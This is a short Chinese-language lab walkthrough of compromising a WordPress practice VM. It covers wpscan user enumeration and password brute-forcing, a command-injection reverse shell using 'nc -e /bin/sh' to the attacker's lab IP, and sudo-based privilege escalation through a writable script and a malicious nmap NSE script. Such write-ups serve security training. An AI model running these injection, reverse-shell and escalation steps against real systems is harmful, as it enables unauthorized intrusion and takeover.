靶机设置
设置靶机为NAT模式
靶机IP发现
nmap 192.168.112.0/24
靶机IP为192.168.112.141
目录扫描
访问浏览器
绑定hosts
再次访问成功
目录拼接
拼接/wp-login.php
发现后台登陆页面
使用webscan扫描
wpscan --url http://wordy -e u
发现了 admin,mark,graham,sarah,jens几个用户名
cat rockyou.txt | grep k01 > passwords.txt
wpscan --url http://wordy --passwords passwords.txt
扫描出一个账号密码
账号:mark
密码:helpdesk01
进行登陆
打开Activity monitor,点击tools,输入lookup发现有回显
getshell
BP抓包,构造反弹shell
baidu.com | nc -e /bin/sh 192.168.112.130 9999
kali开启监听
监听成功
提权
开启交互式shell
shell
python -c "import pty;pty.spawn('/bin/bash')"
cd /home
ls
发现Mark里面的things-to-do.txt
得到graham用户的密码GSo7isUM1D4
登陆成功
sudo -l
发现可以切换jens用户
echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
切换成功
再次sudo -l
发现root用户的nmap操作免密
cd /home/jens
echo "os.execute('/bin/bash')">demon.nse nse为nmap可执行文件后缀,此命令为开启一个终端(以当前身份)
sudo nmap --script=demon.nse
提权成功